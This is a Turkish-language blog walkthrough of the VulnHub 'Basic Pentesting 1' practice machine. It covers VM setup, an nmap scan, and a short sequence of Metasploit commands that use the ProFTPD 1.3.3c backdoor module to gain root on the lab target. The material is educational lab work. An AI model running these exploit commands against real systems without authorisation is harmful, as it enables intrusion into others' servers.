[VULNHUB] Basic Pentesting 1 Walkthrough

Merhaba bugün sizlere giriş seviye bir zafiyetli makinenin çözümünü anlatmaya çalışacagım

Öncelikle Zafiyetli makinemizi indirmek için vulnhub a gidiyorum ve indirme seçeneklerine geliyorum

Oradanda direk google drive gidip indirmeye başlıyorum ve indiridkende alttaki açıklamayı okuyorum ve açıklamadan anladıgım kadarıyle sistemde root olmamın benden beklendigini ve bunun birçok yöntemini oldugunu ögreniyorum

sistemi indirdikten sonra şimdi sıra geldi vmware sanallaştırma yazılımına import edilmesi

Makineyi yüklemek için open virtual machine seçenegine tıklayıp makinenin bilgisayardaki konumunu gösteriyorum

makineyi vmware sanallaştırma yazılıma yükledikten sonra makinenin Nat Netwrok te olup olmadıgını kontrol ediyorum

sonrasında makineye start veriyorum ve geldik Pentest işlemini yapmaya . İlk olarak zafiyetli makinemizim ip adresini bulmaya bunun için

nmap -sn 172.16.124.0/24

komutu ile hangi sistemlere ulaşabildigimize bir bakıyoruz

zafiyetli makinemizin ipsinin 172.16.124.130 oldugunu ögreniyorum

ve sonrasında makine üzerinde tarama yapmaya başlıyorum

sonra açık olan portlarda zafiyet varmı diye tek tek bakıyorum ve aramalarım sonucu ilk arama yaptıgım port ta bir zafiyet oldugunu görüyorum

ve exploit db adresine gidip daha detaylı ögrenmeye çalışıyorum

sonra msfcosnole adlı toolu çalıştrıp

use exploit/unix/ftp/proftpd_133c_backdoor
show options
set rhost 172.16.124.130

ve root ,evet amacımıza ulaştık ama bu makinada tek root olma yöntemi bu degil digerlerinide sizin deneyerek bulmanızı istiyorum

Leave a Reply

Telegram duyuru kanalımıza buradan ulaşabilir,canlı yayınlar ve bir çok ücretsiz içerige hızlıca sahip olabilirsiniz.GİT
+